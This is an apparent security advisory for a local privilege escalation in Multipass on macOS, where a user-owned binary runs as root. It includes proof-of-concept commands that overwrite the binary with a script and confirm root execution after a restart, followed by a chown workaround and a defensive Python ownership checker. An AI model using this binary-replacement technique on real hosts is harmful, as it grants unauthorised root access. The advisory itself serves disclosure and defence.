Impact
Upon installing Multipass 1.15.1 (from Canonical's website) on a macOS host, the following LaunchDaemon is created:
octavio@mac ~ % ls -la /Library/LaunchDaemons/com.canonical.multipassd.plist
-rw-r--r-- 1 root wheel 1131 May 22 13:34 /Library/LaunchDaemons/com.canonical.multipassd.plist
octavio@mac ~ % cat /Library/LaunchDaemons/com.canonical.multipassd.plist
[...]
<key>ProgramArguments</key>
<array>
<string>/Library/Application Support/com.canonical.multipass/bin/multipassd</string>
<string>--verbosity</string>
<string>debug</string>
</array>
[...]
However, the multipassd binary is owned by the local user, and not by root, so it can be replaced with a malicious script:
octavio@mac ~ % echo -ne '#!/bin/sh\nwhoami > /tmp/here\n' > /Library/Application\ Support/com.canonical.multipass/bin/multipassd
This script will be run by the (privileged) daemon upon system restart, which can be used to perform arbitrary actions as root:
octavio@mac ~ % sudo restart
[...]
octavio@mac ~ % cat /tmp/here
root
Patches
Workarounds
If unable to apply the relevant update, the file /Library/Application Support/com.canonical.multipass/bin/multipassd can be set to be owned by root:
sudo chown root:wheel "/Library/Application Support/com.canonical.multipass/bin/multipassd"
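To check for the condition described under Impact, the following Python sketch (an added example, not code from the advisory or from Multipass) reads a launchd job plist and reports whether the program it starts, or any directory above it, is owned or writable by an account other than root. The function names, the `stop_at` parameter and the sample layout built in `demo` are assumptions constructed for illustration.

```python
import os
import plistlib
import stat
import tempfile

def daemon_program(plist_path):
    """Executable a launchd job runs: Program, else ProgramArguments[0]."""
    with open(plist_path, "rb") as fh:
        job = plistlib.load(fh)
    return job.get("Program") or (job.get("ProgramArguments") or [None])[0]

def replaceable_by(path, trusted_uid=0, stop_at="/"):
    """Reasons an account other than trusted_uid could swap out `path`.

    Checks the file and every parent directory up to stop_at, since whoever
    can write a directory can rename or replace the entries inside it.
    """
    findings = []
    current, stop = os.path.realpath(path), os.path.realpath(stop_at)
    while True:
        st = os.lstat(current)
        if st.st_uid != trusted_uid:
            findings.append(f"{current}: owned by uid {st.st_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"{current}: group/other writable")
        parent = os.path.dirname(current)
        if current == stop or parent == current:
            return findings
        current = parent

def demo():
    """Constructed sample: a job plist whose binary the current user owns."""
    base = tempfile.mkdtemp()
    bindir = os.path.join(base, "Application Support", "bin")
    os.makedirs(bindir)
    binary = os.path.join(bindir, "multipassd")
    with open(binary, "w") as fh:
        fh.write("placeholder\n")
    for p in (base, os.path.dirname(bindir), bindir, binary):
        os.chmod(p, 0o755)  # fixed modes so only ownership differs
    plist = os.path.join(base, "job.plist")
    with open(plist, "wb") as fh:
        plistlib.dump({"Label": "example.constructed",
                       "ProgramArguments": [binary, "--verbosity", "debug"]}, fh)
    program = daemon_program(plist)
    me = os.getuid()
    # me + 1 stands in for root: the sample files belong to whoever runs this.
    return (program, replaceable_by(program, me + 1, base),
            replaceable_by(program, me, base))
```

On a macOS host, calling `replaceable_by(daemon_program(p))` for each plist in /Library/LaunchDaemons applies the same check with root as the trusted owner; an empty list means no finding.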
References